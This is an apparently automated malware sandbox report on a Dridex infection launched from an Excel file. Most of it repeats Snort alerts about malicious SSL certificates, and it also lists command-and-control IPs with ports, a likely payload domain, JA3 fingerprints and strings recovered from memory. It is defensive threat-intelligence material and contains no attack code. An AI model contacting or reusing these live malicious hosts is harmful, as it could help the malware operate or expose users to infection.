Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49258
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49259
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49262
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49263
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49266
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49267
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49270
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49271
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49274
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49275
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49278
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49279
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49282
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49283
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49286
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49287
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49290
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49291
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49294
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49295
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49298
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49302
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49306
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49310
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49318
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49322
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49330
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49334
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49338
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49342
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49346
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49350
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49354
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49358
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49362
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49366
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49370
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49374
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49378
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49382
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49386
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49390
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49394
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49398
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49399
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 80.86.91.27:3308
Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 5.100.228.233:3389
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 46.105.131.65:1512
Source: Joe Sandbox View | IP Address: 5.100.228.233
Source: Joe Sandbox View | IP Address: 80.86.91.27
Source: Joe Sandbox View | IP Address: 46.105.131.65
Source: Joe Sandbox View | IP Address: 77.220.64.37
Source: Joe Sandbox View | ASN Name: SENTIANL
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002E39F9 InternetReadFile,4_2_002E39F9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BAE4728.emfJump to behavior
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: www5.ritamartins.pt
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2237170577.0000000000174000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
